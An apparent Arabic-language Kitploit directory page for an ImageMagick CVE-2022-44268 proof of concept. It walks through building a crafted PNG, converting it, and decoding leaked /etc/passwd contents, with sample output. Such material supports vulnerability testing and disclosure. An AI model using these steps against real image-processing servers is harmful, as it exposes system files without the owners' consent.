Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
imagemagick-lfi-poc — إثبات المفهوم (PoC) لثغرة تضمين الملفات المحلية (LFI) في ImageMagick [CVE-2022-44268] | Kitploit
أدوات/GitHubGitHub/sybil-scan/imagemagick-lfi-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبجمع المعلوماتاختبار الاختراق
GitHubsybil-scan/imagemagick-lfi-poc

imagemagick-lfi-poc

إثبات المفهوم (PoC) لثغرة تضمين الملفات المحلية (LFI) في ImageMagick [CVE-2022-44268]

عرض المستودع
539منذ 2 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

إثبات المفهوم لثغرة قراءة الملفات المحلية في ImageMagick [CVE-2022-44268]

اكتشف الباحثون في MetabaseQ ثغرة CVE-2022-44268، حيث أن ImageMagick 7.1.0-49 عرضة لكشف المعلومات. عند تحليل صورة PNG (مثلاً لتغيير الحجم)، قد تحتوي الصورة الناتجة على محتوى ملف عشوائي عن بُعد (إذا كان لدى ثنائي ImageMagick صلاحيات لقراءته).

الاستخدام

  • تأكد من تثبيت ImageMagick وحزم Python المطلوبة.
root@kitploit:~
(~)>>> python3 generate.py -f "/etc/passwd" -o exploit.png

   [>] ImageMagick LFI PoC - by Sybil Scan Research <[email protected]>
   [>] Generating Blank PNG
   [>] Blank PNG generated
   [>] Placing Payload to read /etc/passwd
   [>] PoC PNG generated > exploit.png
  • قم بتحويل ملف PNG المُنشأ:
root@kitploit:~
(~)>>> convert exploit.png result.png
  • اقرأ محتويات ملف PNG المُحوَّل:
root@kitploit:~
(~)>>> identify -verbose result.png
  • قم بفك تشفير البيانات المعادة في حقل Raw profile type، ستلاحظ محتويات :
/etc/passwd
root@kitploit:~
(~)>>> python3 -c 'print(bytes.fromhex("726f6f743a783a726f6f743---REDACTED--").decode("utf-8"))'


root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin

المراجع

  • https://www.metabaseq.com/imagemagick-zero-days/
  • https://github.com/duc-nt/CVE-2022-44268-ImageMagick-Arbitrary-File-Read-PoC
تنزيل الأداة